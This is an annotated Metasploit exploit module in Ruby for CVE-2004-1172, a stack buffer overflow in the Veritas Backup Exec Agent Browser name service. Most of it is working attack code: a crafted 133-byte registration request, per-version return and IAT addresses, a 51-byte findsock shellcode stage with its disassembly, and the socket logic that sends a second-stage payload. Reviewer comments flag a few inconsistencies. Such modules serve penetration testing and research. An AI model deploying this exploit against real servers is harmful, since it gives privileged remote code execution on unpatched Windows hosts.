##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
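class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata: a stack overflow in the Veritas Backup Exec Agent
  # Browser name service (TCP/6101). The overflow only leaves room for a
  # tiny findsock/read stage, so the real payload is sent as a second
  # write on the same socket (see #exploit).
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Veritas Backup Exec Name Service Overflow',
        'Description' => %q{
          This module exploits a vulnerability in the Veritas Backup
          Exec Agent Browser service. This vulnerability occurs when a
          recv() call has a length value too long for the destination
          stack buffer. By sending an agent name value of 63 bytes or
          more, we can overwrite the return address of the recv
          function. Since we only have ~60 bytes of contiguous space
          for shellcode, a tiny findsock payload is sent which uses a
          hardcoded IAT address for the recv() function. This payload
          will then roll the stack back to the beginning of the page,
          recv() the real shellcode into it, and jump to it. This
          module has been tested against Veritas 9.1 SP0, 9.1 SP1, and
          8.6.
        },
        'Author' => [ 'hdm' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2004-1172'],
          [ 'OSVDB', '12418'],
          [ 'BID', '11974'],
          [ 'URL', 'http://www.idefense.com/application/poi/display?id=169&type=vulnerabilities'],
        ],
        'Privileged' => true,
        'Payload' => {
          # The stage recv()s the real payload into a page-aligned stack
          # buffer; these limits bound what that second write may contain.
          'Space' => 1024,
          'MinNops' => 512,
          'StackAdjustment' => -3500,
        },
        'Platform' => %w{win},
        'Targets' => [
          [
            'Veritas BE 9.1 SP0/SP1', # BackupExec 9.1 SP0/SP1 return contributed by class101
            {
              'Platform' => 'win',
              # Rets[0]: return address (not referenced by #exploit as written).
              # Rets[1]: IAT slot of recv(), stored shifted left by 8 bits so the
              # literal has no NUL (0x00401150 -> 0x401150FF); the stage shifts it back.
              'Rets' => [ 0x0142ffa1, 0x401150FF ], # [email protected] v9.1.4691.0 | [email protected]
            },
          ],
          [
            # NOTE(review): the description says the module was tested on 8.6,
            # but this target is labelled 8.5 / v8.50.3572 -- confirm which is right.
            'Veritas BE 8.5',
            {
              'Platform' => 'win',
              # Same layout as target 0: Rets[1] = 0x00401138 shifted (0x401138FF).
              'Rets' => [ 0x014308b9, 0x401138FF ], # [email protected] v8.50.3572 | [email protected] v8.50.3572
            },
          ],
        ],
        'DisclosureDate' => '2004-12-16',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(6101)
      ]
    )
  end

  # Trigger the overflow with a crafted agent registration request, then
  # push the real payload down the same socket for the findsock stage to
  # recv() and execute.
  def exploit
    connect

    print_status("Trying target #{target.name}...")

    # Only Rets[1] (the recv() IAT slot) is consumed by the request builder.
    req = build_registration_request(target['Rets'][1])

    print_status("Sending the agent registration request of #{req.length} bytes...")
    sock.put(req)

    print_status("Sending the payload stage down the socket...")
    sock.put(payload.encoded)

    print_status("Waiting for the payload to execute...")
    select(nil, nil, nil, 2) # plain two-second sleep before checking for a session

    handler
    disconnect
  end

  private

  # Build the 51-byte findsock/read stage (disassembly under __END__).
  #
  # The stage page-aligns ESP, takes a candidate socket handle from the
  # stack, calls recv(sock, esp, 0x10000, 0) through the hardcoded IAT
  # slot, and on success does `call edi` into the received bytes; on a
  # negative return it decrements the handle and retries.
  #
  # The trailing "\xe1\xff\xd7" (the jnz displacement and `call edi`) is
  # taken from the listing; without it the literal is 48 bytes, the
  # comment's "51 bytes" does not hold, and the retry loop has no exit.
  #
  # @param recv_iat [Integer] IAT address of recv() shifted left 8 bits (target Rets[1])
  # @return [String] binary (ASCII-8BIT) stage bytes
  def findsock_stage(recv_iat)
    stage = (
      "\x31\xf6\xc1\xec\x0c\xc1\xe4\x0c\x89\xe7\x89\xfb\x6a\x01\x8b\x74" \
      "\x24\xfe\x31\xd2\x52\x42\xc1\xe2\x10\x52\x57\x56\xb8\xff\x50\x11" \
      "\x40\xc1\xe8\x08\xff\x10\x85\xc0\x79\x07\x89\xdc\x4e\x85\xf6\x75" \
      "\xe1\xff\xd7"
    ).b

    # Offset 29 (0x1D) is the imm32 of `mov eax, <recv_iat>` at 0x1C;
    # the stage's `shr eax, 8` turns 0x401150FF back into 0x00401150.
    stage[29, 4] = [recv_iat].pack('V')
    stage
  end

  # Build the agent registration request that overflows the name buffer.
  #
  # Layout: 6-byte header, a 112-byte name field of 0xfc filler (x86 CLD)
  # with the findsock stage patched in at offset 2, a NUL, the literal
  # "1.1.1.1.1.1\0", and a trailing 0xeb 0x81 (an x86 short jump
  # backwards). NOTE(review): the header bytes and the final jump are kept
  # verbatim from the original module; how that jump reaches the stage is
  # not documented here -- confirm against the advisory before changing it.
  #
  # @param recv_iat [Integer] passed through to #findsock_stage
  # @return [String] binary request bytes (133 bytes)
  def build_registration_request(recv_iat)
    name_field = ("\xfc" * 112).b
    stage = findsock_stage(recv_iat)
    name_field[2, stage.length] = stage

    "\x02\x00\x32\x00\x20\x00".b +
      name_field +
      "\x00".b +
      "1.1.1.1.1.1\x00".b +
      "\xeb\x81".b
  end
end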
__END__
[ findsock stage ] -- disassembly of the stage_read bytes. The imm32 of the `mov eax` at 0x1C (offsets 0x1D-0x20, i.e. stage_read[29, 4]) is overwritten at runtime with the selected target's Rets[1] value before the request is sent.
00000000 31F6 xor esi,esi
00000002 C1EC0C shr esp,0xc
00000005 C1E40C shl esp,0xc
00000008 89E7 mov edi,esp
0000000A 89FB mov ebx,edi
0000000C 6A01 push byte +0x1
0000000E 8B7424FE mov esi,[esp-0x2]
00000012 31D2 xor edx,edx
00000014 52 push edx
00000015 42 inc edx
00000016 C1E210 shl edx,0x10
00000019 52 push edx
0000001A 57 push edi
0000001B 56 push esi
0000001C B8FF501140 mov eax,0x401150ff
00000021 C1E808 shr eax,0x8
00000024 FF10 call near [eax]
00000026 85C0 test eax,eax
00000028 7907 jns 0x31
0000002A 89DC mov esp,ebx
0000002C 4E dec esi
0000002D 85F6 test esi,esi
0000002F 75E1 jnz 0x12
00000031 FFD7 call edi